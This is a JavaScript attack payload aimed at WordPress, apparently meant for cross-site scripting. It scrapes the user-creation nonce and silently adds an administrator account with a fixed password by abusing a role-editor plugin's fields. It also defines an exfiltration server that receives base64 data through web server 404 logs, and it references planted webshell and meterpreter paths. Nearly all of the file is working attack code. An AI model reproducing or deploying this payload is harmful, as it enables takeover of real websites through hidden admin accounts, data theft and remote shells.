// Web server listening for exfil data
// This will be as base64 data with a .js added, trying to
// include a non-exist remote javascript file so you
// get the base64 data in the 404 log
var httpExfilServer = "http://192.168.78.135:8888";
// This will hold the webshell locations
// Note that different wordpress servers
// will save these in different locations,
// we don't control the directory name.
// The add plugin function will parse out
// the correct directory name and update
// these variables as necessary.
var webShellPath = "shell/shell.php";
var phpMetShellPath = "shell/meterpreter.php";
const sleep = (milliseconds) =>
{
return new Promise(resolve => setTimeout(resolve, milliseconds))
}
function read_body(xhr)
{
var data;
if (!xhr.responseType || xhr.responseType === "text")
{
data = xhr.responseText;
}
else if (xhr.responseType === "document")
{
data = xhr.responseXML;
}
else if (xhr.responseType === "json")
{
data = xhr.responseJSON;
}
else
{
data = xhr.response;
}
return data;
}
function addAdminUser()
{
var uri = "/wp-admin/user-new.php";
// The following user will be added as an Administrator level user
var username = "novouser";
var firstName = "trevor";
var lastName = "roach";
var password = "PasswordStrongEnought";
xhr = new XMLHttpRequest();
xhr.open("GET", uri, true);
xhr.send(null);
xhr.onreadystatechange = function()
{
if (xhr.readyState == XMLHttpRequest.DONE)
{
var response = read_body(xhr);
var noncePos = response.indexOf('name="_wpnonce_create-user" value="');
var nonceVal = response.substring(noncePos+35, noncePos+45);
xhr = new XMLHttpRequest();
xhr.open("POST", uri);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
var body = "action=createuser&"
body += "_wpnonce_create-user=" + nonceVal + "&";
body += "_wp_http_referer=%2Fwp-admin%2Fuser-new.php&"
body += "user_login=" + username + "&";
body += "email=" + email + "&";
body += "first_name=" + firstName + "&";
body += "last_name=" + lastName + "&";
body += "uri=&";
body += "pass1=" + password + "&";
body += "pass1-text=" + password + "&";
body += "pass2=" + password + "&";
body += "pw_weak=on&";
body += "send_user_notification=0&";
body += "role=subscriber&";
body += "ure_select_other_roles=administrator&"; // muahahahaha
body += "ure_other_roles=administrator&"; // insert Dr. Evil second muahahahaha
body += "createuser=Add+New+User";
xhr.send(body);
console.log("test inner")
}
console.log("text outer")
}
console.log("LOADED");
alert("loaded");
}
addAdminUser();